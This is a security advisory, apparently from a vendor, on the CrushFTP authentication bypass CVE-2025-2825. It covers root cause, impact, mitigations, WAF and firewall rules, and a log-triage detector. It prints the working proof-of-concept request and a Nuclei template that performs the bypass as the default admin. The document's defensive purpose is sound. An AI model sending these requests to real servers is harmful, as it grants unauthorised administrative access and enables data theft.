Exploited: Critical Unauthenticated Access Vulnerability in CrushFTP (CVE-2025-2825)
CVE-2025-2825 is a critical authentication bypass in CrushFTP, an enterprise file transfer server that many organizations use to move sensitive data in and out of their networks. A remote attacker needs no credentials to exploit it, public proof-of-concept code exists, and exploitation in the wild began within days of the patch, which makes it a top priority for administrators.
What is CVE-2025-2825?
CVE-2025-2825 is a critical authentication bypass affecting CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0 through 11.3.0. A remote, unauthenticated attacker can log in to the HTTP(S) web interface as any existing, enabled account without supplying its password. The same flaw was later assigned CVE-2025-31161 through the vendor-coordinated disclosure; the two identifiers describe one bug.
The vulnerability carries a CVSS 3.1 base score of 9.8 (Critical): network attack vector, low complexity, no privileges or user interaction required, and high impact on confidentiality, integrity and availability (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). It was discovered by researchers at Outpost24 and patched by the vendor on March 21, 2025.
At the core of this vulnerability is an improper authentication implementation (CWE-287) in CrushFTP’s HTTP request handler. The issue specifically resides in the loginCheckHeaderAuth() mechanism, which improperly handles AWS S3-style authentication headers. When a specific condition is triggered, the server allows authentication to succeed without validating the password at all.
The root cause is a logic error in how the Credential field of that header is interpreted. CrushFTP's S3-style login accepts an access key of the form user~password, with the tilde separating the two; when the supplied value contains no tilde there is no password to extract, and the handler sets an internal flag called anyPass. Instead of then demanding some other proof of identity (for an S3-style request, a valid signature), the flow returns the user object as soon as anyPass is set and the account is enabled, so the password check is never reached. Simplified:
```java
// Simplified vulnerable logic from CrushFTP's header authentication handler (10.8.3 / 11.3.0 and earlier)
if (anyPass && user.getProperty("enabled", "").equals("true")) {
    return user; // anyPass is true for a bare "user" credential: the account is returned with no password check
}
// Normal password check, never reached when anyPass is true
if (!password.equals(user.getProperty("password"))) {
    return null; // authentication should fail here
}
```
An attacker therefore only needs an HTTP request that names an existing, enabled account to be logged in as that account without its password. Because CrushFTP ships with a default administrator account named crushadmin, the practical result is full administrative access.
Exploiting the Vulnerability
CVE-2025-2825 is trivially exploitable with minimal technical knowledge. An attacker only needs network access to a vulnerable CrushFTP server’s HTTP/S interface – no credentials required. The exploit involves:
- Crafting a malicious HTTP request with a fake AWS S3 Authorization header and a specially formatted CrushAuth cookie
- Naming an existing, enabled account in the Credential field, typically the default administrator “crushadmin”, without a tilde so that no password is parsed
- Submitting the request to the CrushFTP Web Interface
Here is the publicly documented proof-of-concept request, which is what attackers are sending in the wild:
```http
GET /WebInterface/function/?command=getUserList&c2f=1111 HTTP/1.1
Host: victim-server:8080
Cookie: CrushAuth=1743113839553_vD96EZ70ONL6xAd1DAJhXMZYMn1111
Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/
```
In this request:
- The Authorization header uses an AWS4-HMAC-SHA256 scheme with the credential set to “crushadmin” (the default admin username)
- The CrushAuth cookie is a dummy session token that matches the format expected by the server
- The c2f parameter in the URL matches the last four characters of the CrushAuth cookie, a consistency check the web interface performs on every request; since the attacker controls both values, it is trivially satisfied
When the request is processed, the server sets anyPass because the username (crushadmin) contains no tilde, and the authentication logic returns the account without checking a password or a signature, so the authentication system is bypassed entirely.
The server responds with HTTP 200 and the requested data (here, the list of user accounts). At this point the attacker holds the privileges of the crushadmin account, an administrator by default, and can read sensitive files, upload content, create backdoor accounts, or change server settings through the same web interface.
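The following model of the header-authentication flow is an added illustration written for this article; it is not CrushFTP's source code. The USERS table, the S3 secrets and the sign_request() routine are constructed stand-ins for CrushFTP's user store and for real AWS SigV4 verification (which canonicalises far more of the request). It runs the proof-of-concept headers from above through the pre-patch logic, where anyPass returns the account immediately, and through a patched flow where a bare username is accepted only with a signature computed from that account's stored secret.

```python
"""Model of the header-authentication logic described above (added illustration,
not CrushFTP source). USERS, the S3 secrets and sign_request() are constructed
stand-ins for CrushFTP's user store and for real AWS SigV4 verification."""
import hashlib
import hmac
import re

# Constructed user store (assumption): three accounts, one of them disabled.
USERS = {
    "crushadmin": {"enabled": True, "password": "S3cret!Admin", "s3_secret": "k-admin-0001"},
    "alice": {"enabled": True, "password": "alicepw", "s3_secret": "k-alice-0002"},
    "bob": {"enabled": False, "password": "bobpw", "s3_secret": "k-bob-0003"},
}
CRED_RE = re.compile(r"Credential=([^/,\s]+)")
SIG_RE = re.compile(r"Signature=([0-9a-f]+)")

# The proof-of-concept request from the article, as a header dictionary.
EXPLOIT_HEADERS = {
    "Cookie": "CrushAuth=1743113839553_vD96EZ70ONL6xAd1DAJhXMZYMn1111",
    "Authorization": "AWS4-HMAC-SHA256 Credential=crushadmin/",
}


def c2f_matches_cookie(c2f, cookie_header):
    """The WebInterface only processes the request if c2f equals the last four
    characters of CrushAuth. Any made-up cookie ending in 1111 satisfies it."""
    m = re.search(r"CrushAuth=([^;]+)", cookie_header or "")
    return bool(m) and m.group(1)[-4:] == c2f


def parse_credential(authorization):
    """Return (username, embedded_password, any_pass) for an AWS4-HMAC-SHA256
    header. A tilde means the access key is "user~password"; a bare username
    gives the server no password to check, which is what sets anyPass."""
    if not authorization or not authorization.startswith("AWS4-HMAC-SHA256"):
        return None
    m = CRED_RE.search(authorization)
    if not m:
        return None
    key = m.group(1)
    if "~" in key:
        user, password = key.split("~", 1)
        return user, password, False
    return key, None, True


def login_check_header_auth_vulnerable(headers):
    """Pre-patch flow: anyPass returns the account before any proof is checked (CWE-287)."""
    parsed = parse_credential(headers.get("Authorization"))
    if parsed is None:
        return None
    username, password, any_pass = parsed
    user = USERS.get(username)
    if user is None or not user["enabled"]:
        return None
    if any_pass:
        return username  # BUG: no password, no signature, still logged in
    return username if hmac.compare_digest(password, user["password"]) else None


def sign_request(secret, method, path, query, amz_date):
    """Constructed stand-in for SigV4: HMAC-SHA256 over a minimal canonical request."""
    canonical = "\n".join([method, path, query, amz_date])
    return hmac.new(secret.encode(), canonical.encode(), hashlib.sha256).hexdigest()


def login_check_header_auth_patched(headers, method, path, query):
    """Patched flow: a bare username is accepted only with a signature made from
    that account's stored secret over this exact request; there is no early return."""
    parsed = parse_credential(headers.get("Authorization"))
    if parsed is None:
        return None
    username, password, any_pass = parsed
    user = USERS.get(username)
    if user is None or not user["enabled"]:
        return None
    if not any_pass:
        return username if hmac.compare_digest(password, user["password"]) else None
    sig = SIG_RE.search(headers["Authorization"])
    expected = sign_request(user["s3_secret"], method, path, query, headers.get("X-Amz-Date", ""))
    return username if sig and hmac.compare_digest(sig.group(1), expected) else None


def make_signed_headers(username, method, path, query, amz_date):
    """What a legitimate S3-style client holding the account's secret would send."""
    sig = sign_request(USERS[username]["s3_secret"], method, path, query, amz_date)
    return {
        "X-Amz-Date": amz_date,
        "Authorization": (f"AWS4-HMAC-SHA256 Credential={username}/{amz_date[:8]}/us-east-1/s3/aws4_request, "
                          f"SignedHeaders=host;x-amz-date, Signature={sig}"),
    }


if __name__ == "__main__":
    path, query = "/WebInterface/function/", "command=getUserList&c2f=1111"
    print("c2f/cookie check passes:", c2f_matches_cookie("1111", EXPLOIT_HEADERS["Cookie"]))
    print("vulnerable server logs in as:", login_check_header_auth_vulnerable(EXPLOIT_HEADERS))
    print("patched server logs in as:", login_check_header_auth_patched(EXPLOIT_HEADERS, "GET", path, query))
```

The point of the patched flow is that every branch ends in a comparison against something only the real account holder possesses: the embedded password when a tilde is present, the request signature when it is not. A disabled account fails on both servers, which is why the exploit targets an enabled default account such as crushadmin.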
Multiple security firms have published proof-of-concept (PoC) exploits and automated scan tools for this vulnerability, including Nuclei templates that can detect vulnerable servers. This widespread availability of exploitation tools means that even low-skilled attackers can easily target vulnerable systems.
Potential Risks
The impact of CVE-2025-2825 is severe across the confidentiality, integrity, and availability (CIA) triad:
- Confidentiality breach
  - Attackers can read and exfiltrate any file the server manages, including confidential documents, intellectual property, and customer data
- Integrity compromise
  - Files can be modified, deleted, or replaced, and malware planted in content that other users download
  - Server configuration and settings can be altered through the administrative functions
- Availability and complete compromise
  - Administrative access allows uploading arbitrary files and changing server settings, which can be escalated to code execution on the host
  - Ransomware deployment across all accessible files
  - Persistent backdoor accounts for continued access
  - Lateral movement to other internal systems on the same network
The real-world threat landscape makes this vulnerability particularly concerning:
- Active Exploitation in the Wild: Within days of disclosure, security researchers observed widespread scanning and exploitation attempts. The Shadowserver Foundation identified approximately 1,800 exposed CrushFTP instances worldwide (over 900 in the U.S.) and reported dozens of exploitation attempts against their honeypots.
- Attractive Target for Threat Actors: File transfer systems like CrushFTP are prime targets for cybercriminals, especially ransomware gangs and data extortion groups. Attackers have a documented history of leveraging vulnerabilities in file-sharing solutions (such as MOVEit Transfer and Citrix ShareFile) to orchestrate large-scale breaches.
Given the critical CVSS score (9.8), ease of exploitation, and confirmed attack activity, any internet-facing CrushFTP server running an affected version represents an immediate and severe security risk that requires urgent remediation.
Mitigation Steps
To protect your systems from CVE-2025-2825, immediate action is required. Here are the recommended mitigation strategies:
1. Update CrushFTP Immediately
The most effective remediation is to update your CrushFTP installation to a patched version:
- For CrushFTP 11.x users: Upgrade to version 11.3.1 or later
- For CrushFTP 10.x users: Upgrade to version 10.8.4 or later
```bash
# Example steps for updating CrushFTP (general process; adjust paths and the service name to your install)
# 1. Download the latest version from the CrushFTP website
# 2. Stop your CrushFTP service
systemctl stop crushftp    # or the equivalent command for your system
# 3. Back up your existing installation
cp -r /path/to/crushftp /path/to/crushftp_backup
# 4. Extract and replace the CrushFTP files
# 5. Restart the service
systemctl start crushftp   # or the equivalent command for your system
# 6. Verify the version after the update in the admin interface or the logs
```
On CrushFTP v11.2.3_19 or later you can also enable automatic updates by setting daily_check_and_auto_update_on_idle in prefs.XML, so that future patches are fetched without manual intervention.
2. Implement Network Protections (If Patching Is Delayed)
If immediate patching is not possible, implement temporary measures to reduce your attack surface:
Enable CrushFTP’s DMZ Proxy Mode: The vendor has confirmed that the CVE-2025-2825 exploit does not work when the CrushFTP DMZ proxy is properly configured. In this mode, an external proxy instance handles internet traffic and communicates securely with the internal server.
```xml
<!-- Example configuration in prefs.XML to enable DMZ mode; the item names are illustrative -->
<item name="dmz_mode">true</item>
<item name="dmz_server_key">your_secure_key_here</item>
<item name="dmz_remote_server">internal_server_address</item>
```
Treat the item names above as a sketch: set up DMZ mode through the admin interface as documented by the vendor and confirm the resulting prefs.XML entries rather than copying these keys verbatim.
Restrict Network Access via Firewall/WAF: Use firewall rules or cloud security groups to limit incoming traffic to the CrushFTP HTTP/S ports (typically 8080 or 443) to only trusted IP addresses:
```bash
# Example iptables rules to restrict access to the CrushFTP HTTP port (repeat for the HTTPS port)
# Insert at the top of INPUT so that an existing, broader ACCEPT rule does not override them
iptables -I INPUT 1 -p tcp --dport 8080 -j DROP                      # block everything else...
iptables -I INPUT 1 -p tcp --dport 8080 -s 192.168.1.0/24 -j ACCEPT  # ...except the internal network (ends up first)
```
```apache
# Example ModSecurity rule chain: block S3-style Authorization headers aimed at the web interface.
# Matching on the header alone would also break legitimate S3 clients of CrushFTP's S3 endpoint,
# so the chain restricts the block to /WebInterface/ paths.
SecRule REQUEST_URI "@beginsWith /WebInterface/" \
    "id:1000001,phase:1,deny,status:403,chain,msg:'Potential CrushFTP CVE-2025-2825 exploit attempt'"
    SecRule REQUEST_HEADERS:Authorization "@beginsWith AWS4-HMAC-SHA256"
```
Require VPN access for remote users to prevent direct exposure to the internet.
3. Monitor and Harden
Whether you’ve patched or not, ensure the threat is detected and mitigated:
Check for Indicators of Compromise: Review your CrushFTP server logs for signs of unauthorized access, particularly focusing on default accounts:
```text
# Illustrative log entries (the layout is schematic, not CrushFTP's exact log format)
2025-03-25 12:34:56 - [LOGIN] Login successful for user 'crushadmin' from IP 203.0.113.37
2025-03-26 08:12:34 - [USER] New user 'backdoor_admin' created by 'crushadmin'
```
Look for unusual activity such as account creation, permission changes, or file operations from unexpected sources, and in particular for successful crushadmin logins from addresses that never legitimately administer the server.
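The triage script below is an added example for this article, not CrushFTP or vendor tooling. It serves two of the steps above: it encodes the narrow request signature a WAF or reverse proxy should block (an S3-style Authorization header sent to /WebInterface/, a bare access key without a tilde, and a c2f value equal to the CrushAuth cookie suffix), and it applies that signature to a request log to separate attempts from likely successful bypasses. The JSON-lines layout and every entry in SAMPLE_LOG are constructed for the example; CrushFTP's own logs do not record request headers in this form, so point it at a proxy or WAF log that does.

```python
"""Triage of a reverse-proxy request log for CVE-2025-2825 exploit attempts
(added illustration, not CrushFTP or vendor tooling). The JSON-lines layout and
every entry in SAMPLE_LOG are constructed; CrushFTP's own logs do not record
request headers like this, so feed it a proxy or WAF log that does."""
import json
import re
from collections import Counter

CRED_RE = re.compile(r"Credential=([^/,\s]+)")
CRUSHAUTH_RE = re.compile(r"CrushAuth=([^;]+)")
C2F_RE = re.compile(r"(?:^|&)c2f=([^&]*)")

# Constructed sample log: one successful exploit, one blocked attempt,
# one legitimate S3 upload, one legitimate session on the web interface.
SAMPLE_LOG = """\
{"ts": "2025-03-25T12:34:56Z", "src": "203.0.113.37", "method": "GET", "path": "/WebInterface/function/", "query": "command=getUserList&c2f=1111", "status": 200, "headers": {"Cookie": "CrushAuth=1743113839553_vD96EZ70ONL6xAd1DAJhXMZYMn1111", "Authorization": "AWS4-HMAC-SHA256 Credential=crushadmin/"}}
{"ts": "2025-03-25T12:40:10Z", "src": "198.51.100.8", "method": "GET", "path": "/WebInterface/function/", "query": "command=getUserList&c2f=1111", "status": 403, "headers": {"Cookie": "CrushAuth=1743113839553_vD96EZ70ONL6xAd1DAJhXMZYMn1111", "Authorization": "AWS4-HMAC-SHA256 Credential=crushadmin/"}}
{"ts": "2025-03-25T13:00:00Z", "src": "192.0.2.10", "method": "PUT", "path": "/backups/db.tar.gz", "query": "", "status": 200, "headers": {"Authorization": "AWS4-HMAC-SHA256 Credential=backupsvc/20250325/us-east-1/s3/aws4_request, SignedHeaders=host;x-amz-date, Signature=0a1b2c"}}
{"ts": "2025-03-25T13:05:00Z", "src": "192.0.2.11", "method": "GET", "path": "/WebInterface/function/", "query": "command=getUserList&c2f=9f3a", "status": 200, "headers": {"Cookie": "CrushAuth=1743120000000_realSessionTokenValue9f3a"}}
"""


def classify(entry):
    """Return the reasons this request matches the exploit pattern ([] if none).
    Only the WebInterface path is considered: legitimate S3 clients use the same
    Authorization scheme but never talk to /WebInterface/function/."""
    headers = entry.get("headers", {})
    auth = headers.get("Authorization", "")
    reasons = []
    if not entry.get("path", "").startswith("/WebInterface/") or not auth.startswith("AWS4-HMAC-SHA256"):
        return reasons
    reasons.append("S3-style Authorization header sent to the WebInterface")
    cred = CRED_RE.search(auth)
    if cred and "~" not in cred.group(1):
        reasons.append(f"bare access key {cred.group(1)!r} (no tilde: the anyPass path)")
    cookie = CRUSHAUTH_RE.search(headers.get("Cookie", ""))
    c2f = C2F_RE.search(entry.get("query", ""))
    if cookie and c2f and cookie.group(1)[-4:] == c2f.group(1):
        reasons.append("c2f equals the CrushAuth cookie suffix")
    return reasons


def triage(log_text):
    """Parse a JSON-lines log, flag matching requests and split them by outcome.
    A 200 on a flagged request means the bypass most likely worked."""
    flagged, per_source = [], Counter()
    for line in log_text.splitlines():
        if not line.strip():
            continue
        entry = json.loads(line)
        reasons = classify(entry)
        if reasons:
            flagged.append({"ts": entry["ts"], "src": entry["src"], "status": entry["status"], "reasons": reasons})
            per_source[entry["src"]] += 1
    likely_success = [f for f in flagged if f["status"] == 200]
    return flagged, likely_success, per_source


if __name__ == "__main__":
    flagged, likely_success, per_source = triage(SAMPLE_LOG)
    for f in flagged:
        print(f["ts"], f["src"], f["status"], "; ".join(f["reasons"]))
    print("likely successful bypasses:", [(f["ts"], f["src"]) for f in likely_success])
    print("attempts per source:", dict(per_source))
```

The first condition alone (S3-style header on a WebInterface path) is what a WAF rule should key on; the other two reasons add confidence but are not needed for blocking. Any flagged request that received a 200 before the patch was applied should be treated as a confirmed compromise of the named account, and the source addresses should be checked against the server's own login and user-management logs.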
Secure Default Credentials: Change default passwords and consider renaming or disabling default accounts when possible:
```text
# In the CrushFTP admin interface:
1. Navigate to Users > crushadmin
2. Set a strong, unique password (20+ characters with mixed case, numbers, and symbols)
3. Consider renaming the default admin account
4. Enable two-factor authentication if available
```
Apply Least Privilege Principle: Review your CrushFTP user permissions and server access rights:
```xml
<!-- Illustrative user settings to restrict capabilities; item names are schematic,
     use the User Manager in the admin interface for the real settings -->
<user name="standard_user">
  <item name="admin">false</item>
  <item name="view_log">false</item>
  <item name="root_dir">/limited/access/path</item>
  <!-- Additional restrictions -->
</user>
```
Isolate the CrushFTP server from critical systems and limit its access to only necessary resources.
Use Security Tools for Detection: Implement vulnerability scanning to identify unpatched instances. Community-provided detection tools, such as the Nuclei template for CVE-2025-2825, can help locate vulnerable servers. Note that such a template works by performing the bypass itself (a 200 with a user list means the check logged in as crushadmin), so run it only against systems you are authorized to test:
```yaml
# Example Nuclei template snippet for detecting CVE-2025-2825
# (Nuclei v3 syntax: the older "requests:" key is deprecated in favour of "http:")
id: crushftp-auth-bypass
info:
  name: CrushFTP Authentication Bypass
  author: security-researcher
  severity: critical
  description: Detects CrushFTP servers vulnerable to CVE-2025-2825 authentication bypass
http:
  - method: GET
    path:
      - "{{BaseURL}}/WebInterface/function/?command=getUserList&c2f=1111"
    headers:
      # c2f above must equal the last four characters of this cookie
      Cookie: "CrushAuth=1743113839553_vD96EZ70ONL6xAd1DAJhXMZYMn1111"
      Authorization: "AWS4-HMAC-SHA256 Credential=crushadmin/"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - "<username>"   # confirm the element name against a captured getUserList response
```
By implementing these mitigation strategies promptly, you can protect your systems from this critical vulnerability and minimize the risk of compromise.
Am I Impacted by CVE-2025-2825?
IONIX is actively tracking this vulnerability. Our security research team has developed a full exploit simulation model based on known exploits. This allows us to assess which customers have impacted assets. IONIX customers can view updated information on their specific assets in the threat center of the IONIX portal.
References
- National Vulnerability Database: CVE-2025-2825 – NIST National Vulnerability Database entry for CrushFTP Unauthenticated Access Vulnerability
- CrushFTP Official Advisory: Update Notice – Vendor security advisory on Unauthenticated HTTP(S) Port Access on CrushFTP v10/v11
- ProjectDiscovery Research: CrushFTP Authentication Bypass – Technical deep dive and proof-of-concept exploit details
- Help Net Security: Patch critical vulnerability ASAP! – Vulnerability overview and mitigation guidance
- SecurityWeek: Hackers Exploiting CrushFTP Vulnerability – Threat landscape analysis including exploitation attempts and affected asset count